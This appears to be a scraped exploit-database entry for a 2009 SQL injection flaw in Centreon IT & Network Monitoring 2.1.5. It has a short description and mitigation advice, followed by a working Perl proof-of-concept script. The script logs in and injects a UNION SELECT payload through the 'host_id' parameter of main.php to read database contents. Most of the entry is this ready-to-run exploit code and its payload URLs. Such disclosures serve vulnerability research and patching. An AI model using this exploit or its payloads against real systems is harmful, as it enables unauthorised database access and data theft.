Centreon IT & Network Monitoring v2.1.5 - Injection SQL

vendor:

IT & Network Monitoring

by:

Jonathan Salwan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: IT & Network Monitoring

Affected Version From: 2.1.5

Affected Version To: 2.1.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Centreon IT & Network Monitoring v2.1.5 – Injection SQL

An attacker can exploit a SQL injection vulnerability in Centreon IT & Network Monitoring v2.1.5 to execute arbitrary SQL commands on the underlying database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'host_id' parameter of the 'main.php' script. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database, modify data, or execute arbitrary system commands with the privileges of the web server process.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be configured to use the least-privileged account with access to the database.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# //--------[PoC]---------//
#
# Title	  : Centreon IT & Network Monitoring v2.1.5 - Injection SQL
# Version : 2.1.5
# Author  : Jonathan Salwan (j.salwan@sysdream.com)
#
#
# [Vuln sql injection]
# http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL Injection]&o=p&min=1
# 
# http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1
#
#
# //-------[Credit]-------//
#
# http://www.sysdream.com
# http://www.shell-storm.org
#

use LWP::UserAgent;

my $url   = 'http://localhost/centreon/index.php';
my $login = 'login';
my $paswd = 'pwd';
my $sql   = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1';

my $ua = LWP::UserAgent->new;
my $response = $ua->get($url);
my $cook = $response->header('Set-Cookie');

my $req2 = $ua->post($url, 
	            {useralias => $login, password => $paswd, submit => 'login'},
                    Cookie => $cook,
		    Content-Type => 'application/x-www-form-urlencoded'
                    );

my $response = $ua->get($sql, Cookie => $cook);
my $content = $response->content();

	open(FILE, '>sql-centreon.txt');
	print FILE $content;
	close(FILE);

	print "\n[Answer SQL Injection]\n\n";

	my $selection = system('cat sql-centreon.txt | grep ">Host</td>"');
	unlink('sql-centreon.txt');	

print "\n";